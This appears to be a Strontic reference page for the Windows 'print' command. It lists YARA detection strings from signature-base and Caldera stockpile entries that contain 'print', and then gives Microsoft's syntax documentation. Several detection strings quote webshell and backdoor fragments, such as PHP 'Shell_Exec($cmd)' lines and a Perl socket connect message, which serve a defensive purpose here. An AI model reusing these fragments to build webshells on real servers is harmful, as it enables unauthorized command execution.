signature-base | apt_eqgrp.yar | $s8 = “print ‘Debug info ‘,’=’*40” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp_apr17.yar | $s2 = “print "java -jar jscanner.jar$scanth$list\n";” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp_apr17.yar | $x1 = “print ‘ -s storebin use storebin as the Store executable\n’” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp_apr17.yar | $x3 = “print ‘ -k keyfile the key text file to inject’” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_op_wocao.yar | $a = “out.print("All seems fine.");” | CC BY-NC 4.0 |
signature-base | apt_op_wocao.yar | $e = “out.print((char)c);}in.close()” | CC BY-NC 4.0 |
signature-base | apt_op_wocao.yar | $f = “out.print((char)c);}er.close()” | CC BY-NC 4.0 |
signature-base | apt_project_sauron_extras.yar | $s2 = “Print only replying Ips” | CC BY-NC 4.0 |
signature-base | apt_pulsesecure.yar | $s3 = /if[\x09\x20]{0,32}(CGI::param([\x22\x27]\w{1,64}[\x22\x27]))\s{0,128}{[\x09\x20]{0,32}print [\x22\x27]Cache-Control: no-cache\n[\x22\x27][\x09\x20]{0,32};\s{0,128}print [\x22\x27]Content-type: text\/html\n\n[\x22\x27][\x09\x20]{0,32};\s{0,128}my $\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}CGI::param([\x22\x27]\w{1,64}[\x22\x27])[\x09\x20]{0,32};\s{0,128}system([\x22\x27]$/ | CC BY-NC 4.0 |
signature-base | apt_pulsesecure.yar | $s4 = /sed -i [^\r\n]{1,128}CGI::param([^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Cache-Control: no-cache[^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Content-type: text\/html[^\r\n]{1,128}my [^\r\n]{1,128}=[\x09\x20]{0,32}CGI::param([^\r\n]{1,128}system(/ | CC BY-NC 4.0 |
signature-base | apt_pulsesecure.yar | $r3 = /if[\x09\x20]{0,32}($\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27])\s{0,128}{\s{1,128}print[\x09\x20]{0,32}[\x22\x27]Content-type/ | CC BY-NC 4.0 |
signature-base | apt_pulsesecure.yar | $s4 = “print $_” | CC BY-NC 4.0 |
signature-base | apt_pulsesecure.yar | $s6 = “print MIME::Base64::encode(RC4(“ | CC BY-NC 4.0 |
signature-base | apt_sandworm_centreon.yar | $pl_socket = “socket(SOCKET, PF_INET, SOCK_STREAM,$tcp) or die print "$l$e$!$l” | CC BY-NC 4.0 |
signature-base | apt_sandworm_centreon.yar | $msg1 = “print "$l OK! I\‘m successful connected.$l"” | CC BY-NC 4.0 |
signature-base | apt_sandworm_centreon.yar | $msg2 = “print "$l OK! I\‘m accept connection.$l"” | CC BY-NC 4.0 |
signature-base | cn_pentestset_scripts.yar | $s0 = “print "[] Connected to remote host \n"; “ fullword ascii / PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
signature-base | cn_pentestset_scripts.yar | $s1 = “print "Usage: $0 [Host] [Port] \n\n"; “ fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
signature-base | cn_pentestset_scripts.yar | $s5 = “print "[] Resolving HostName\n"; “ fullword ascii / PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
signature-base | exploit_shitrix.yar | $s07 = “template.new({‘BLOCK’=’print readpipe(“ ascii /* TrustedSec templae */ | CC BY-NC 4.0 |
signature-base | gen_cn_webshells.yar | $s3 = “out.print("Hi,Man 2015 ");” fullword ascii |
CC BY-NC 4.0 |
signature-base | gen_cn_webshells.yar | $s6 = “out.print("</pre>");” fullword ascii | CC BY-NC 4.0 |
signature-base | gen_cn_webshells.yar | $s7 = “out.print("<pre>");” fullword ascii | CC BY-NC 4.0 |
signature-base | gen_cn_webshells.yar | $s4 = “out.print("Hi,Man 2015");” fullword ascii | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s4 = “print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s0 = “ out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s0 = “</font><%out.print(request.getRealPath(request.getServletPath())); %>” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s4 = “print "<form action=\"".$me."?p=cmd&dir=".realpath(‘.’)."” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s8 = “print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s1 = “print "\n".’Tip: to view the file "as is" - open the page in <a href="‘.Dx” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s9 = “if(cmd.equals("Szh0ZWFt")){out.print("[S]"+dir+"[E]");}” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = “out.print(") <A Style=’Color: " + fcolor.toString() + ";’ HRef=’?file=" + fn” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s7 = “if(flist[i].canRead() == true) out.print("r" ); else out.print("-");” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s5 = “print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s8 = “print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s0 = “copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = “python -c"import md5;x=md5.new(‘you_password’);print x.hexdigest()"” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s0 = “print "\n".’Tip: to view the file "as is" - open the page in <a href="‘.Dx” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s1 = “print "Sending mail to $to……. ";” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = “print "Asmodeus Perl Remote Shell” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = “print "\n".’<tr><td width=100pt class=linelisting> |
CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s1 = “print "<tr><td>Server is:</td><td>".$_SERVER[‘SERVER_SIGNATURE’]."</td” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = “print "<tr><td>Execute command:</td><td><input size=100 name=\"_cmd” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s3 = “print "error; help: head -n 16 d00r.py"” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s4 = “print "PW:",PW,"PORT:",PORT,"HOST:",HOST” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s3 = “print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = “print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s2 = “print(" Provenance du mail : <input type=\"text\" name=\"provenanc” |
CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s3 = “<? if($cmd != "") print Shell_Exec($cmd);?>” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s8 = “print "<form action=\"".$me."?p=chmod&file=".$content."&d” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s18 = “print shell_exec($command);” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s5 = “print " |
CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s7 = “print " |
CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s14 = “print "<tr><td>System type:</td><td>$UName</td></tr>";” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s20 = “print "Transfered $TargetFileSize Bytes. ";” fullword |
CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s12 = “print "Sending mail to $to……. "; “ fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s4 = “<? if($cmd != "") print Shell_Exec($cmd);?>” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s12 = “print « "[kalabanga]";” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s5 = “print " |
CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s6 = “print "Sorry, none of the command functions works.";” fullword | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | $s3 = “print("<p align=\"center\"><font size=\"5\">Exploit include “ | CC BY-NC 4.0 |
stockpile | b007fe0c-c6b0-4fda-915c-255bbc070de2.yml | description: copy the contents for the clipboard and print them |
Apache-2.0 |
stockpile | 6c91884e-11ec-422f-a6ed-e76774b0daac.yml | - source: host.print.file |
Apache-2.0 |
stockpile | 6c91884e-11ec-422f-a6ed-e76774b0daac.yml | target: host.print.size |
Apache-2.0 |
stockpile | 6e1a53c0-7352-4899-be35-fa7f364d5722.yml | name: Print Working Directory |
Apache-2.0 |
stockpile | 6e1a53c0-7352-4899-be35-fa7f364d5722.yml | description: Print the current working directory on the system |
Apache-2.0 |
stockpile | a41c2324-8c63-4b15-b3c5-84f920d1f226.yml | command: 'find ~ -type f -name #{host.print.file} 2>/dev/null' |
Apache-2.0 |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
Sends a text file to a printer. A file can print in the background if you send it to a printer connected to a serial or parallel port on the local computer.
[!NOTE] You can perform many configuration tasks from the command prompt by using the Mode command, including configuring a printer connected to a parallel or a serial port, displaying printer status, or preparing a printer for code page switching.
Syntax
print [/d:<printername>] [<drive>:][<path>]<filename>[ ...]
Parameters
Parameter | Description |
---|---|
/d:<printername> |
Specifies the printer that you want to print the job. To print to a locally connected printer, specify the port on your computer where the printer is connected. Valid values for parallel ports are LPT1, LPT2, and LPT3. Valid values for serial ports are COM1, COM2, COM3, and COM4. You can also specify a network printer by using its queue name (\\server_name\printer_name ). If you don’t specify a printer, the print job is sent to LPT1 by default. |
<drive> : |
Specifies the logical or physical drive where the file you want to print is located. This parameter isn’t required if the file you want to print is located on the current drive. |
<path> |
Specifies the location of the file you want to print. This parameter isn’t required if the file you want to print is located in the current directory. |
<filename>[ ...] |
Required. Specifies the file you want to print. You can include multiple files in one command. |
/? | Displays help at the command prompt. |
Examples
To send the report.txt file, located in the current directory, to a printer connected to lpt2 on the local computer, type:
print /d:lpt2 report.txt
To send the report.txt file, located in the c:\accounting directory, to the printer1 print queue on the /d:\copyroom server, type:
print /d:\\copyroom\printer1 c:\accounting\report.txt
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.